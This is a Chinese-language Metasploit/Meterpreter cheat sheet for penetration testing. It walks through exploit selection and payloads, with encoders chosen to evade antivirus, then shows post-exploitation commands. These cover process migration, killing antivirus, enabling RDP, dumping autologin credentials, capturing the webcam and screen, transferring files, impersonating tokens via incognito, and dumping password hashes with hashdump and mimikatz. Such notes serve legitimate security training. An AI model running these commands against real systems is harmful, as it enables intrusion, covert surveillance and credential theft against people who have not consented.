msf

msf体系结构

Metasploit是一款开源的渗透测试框架也是一个逐步发展与成熟的漏洞研究与渗透代码开发平台

模块

辅助模块(Aux):网络服务的扫描查点、口令猜解、敏感信息嗅探、Fuzz测试发掘漏洞、网络协议欺骗

渗透攻击模块(Exploits)

后渗透攻击模块(Post)

攻击载荷模块(Payloads)

空指令模块(Nops)

编码器模块(Encoders)

console的使用

service postgresql start //先连接数据库

msfconsole  //打开框架

msf>help  //显示msf所支持的命令列表

msf>help search  //显示关于search参数的命令和使用

实战攻击步骤

1)扫描目标系统,寻找可用漏洞(search scanner客可发现大量辅助扫描模块)

2)选择并配置漏洞利用模块(use exploit/../samba)

3)选择并配置攻击载荷(set payload ...)

4)选择编码技术,绕过杀软

5)开始攻击,run

后渗透攻击(Meterpreter)

信息收集

进程迁移

刚获得Meterpreter Shell时,该Shell是极其脆弱和易受攻击的,可以把它和目标机中一个稳定的程序绑定

getpid        //查看Meterpreter Shell的进程号

ps            //获取目标机正运行的进程

migrate 786    //将shell迁移到PID为786的进程中

系统命令

sysinfo        //查看系统信息

run post/windows/gather/checkvm    //检查目标是否虚拟机

idletime        //查看目标系统已运行时间

route        //查看目标机完整网络设置

getuid        //查看当前权限

run post/windows/manage/killav    //关闭杀软

run post/windows/manage/enable_rdp    //开启目标远程桌面

background    //将meterpreter隐藏在后台

route add IP 子网掩码        //添加路由,先background

run post/windows/gather/enum_logged_on_users    //列举当前登陆用户

run post/windows/gather/enum_applications        //列举应用程序

run windows/gather/credentials/windows_autologin    //列举自动登陆的用户名和密码

screenshot    //抓取截屏

webcam_list    //摄像头列表

webcam_snap //摄像头拍照

webcam_stream    //抓取视频

shell    //进入目标机shell,exit退出shell

系统命令

pwd,ls,cd

search -f *.txt -d c:\            //搜索文件

upload D:\s.exe -> D:\s.exe    //上传文件

download c:\1.txt /root        //下载文件

权限提升

纵向提取:在一台目标上,低权限角色获取高权限角色

横向提权:通过A获取B的权限,获取同级别角色的权限

进入shell,whoami/groups查看当前权限

先用meterpreter>getsystem尝试提权

不行的话,查补丁,利用漏洞提权。

令牌窃取

1.令牌简介及原理

令牌(Token) 就是系统的临时秘钥,相当于账户名和密码,用来决定是否允许这次请求

和判断这次请求是属于哪一个用户的。

它允许你在不提供密码和其它凭证的前提下,访问网络和系统资源。

这些令牌持续存在于系统中,除非系统重新启动。

令牌最大的特点就是随机性,不可预测,一般黑客或软件无法猜测出来。

令牌有很多种,比如访问令牌(Access Token)表示访问控制操作主题的系统对象;

密保令牌(Security token)又叫做认证令牌或硬件令牌,是一种计算机身份校验的物理设备,例如U盾;

会话令牌(Session Token)是交互回话中唯一的身份标识符。

在假冒令牌攻击中需要使用Kerberos协议

Kerberos协议是一种网络认证协议,其设计目标是通过秘钥系统为客户机/服务器应用程序提供强大的认证服务

客户端请求证书过程:

  • 客户端向认证服务器(AS)发送请求,要求得到服务器的证书。

  • AS收到请求后,将包含客户端密钥的加密证书相应发送给客户端。

  • 该证书包括服务器tivket(包括服务器密钥加密的客户机身份和一份回话密钥)和一个临时加密密钥(又称会话密钥,session key)。

  • 认证服务器也会给服务器发送一份该证书,用来使服务器认证登录客户端的身份。

  • 客户端将ticket传送到服务器上,服务器确认该客户端的话,便允许他登录服务器。

  • 客户端登录成功后,攻击者就可以通过入侵服务器获取客户端的令牌。

假冒令牌实战

Meterpreter > getsystem 提权失败

use incognito

list_tokens -u 列出可用token

有两种类型的token:

Delegation Tokens,授权令牌,支持交互式登录(远程桌面)

Impersonation Tokens,模拟令牌,是非交互的会话。

impersonate_token HOSTNAME\\USERNAME(目标主机名) # 中间两个反斜杠

shell #进入系统shell,whoami,查看是否成功假冒系统管理员

Hash攻击

Meterpreter > hashdump        #导出Hash,要有系统级用户权限

Meterpreter > run windows/gather/smart_hashdump        #导出域内hash

Meterpreter > load mimikatz

Meterpreter > mimikatz_command -f samdump::hashes    #导出Hash,要有系统级用户权限

Last updated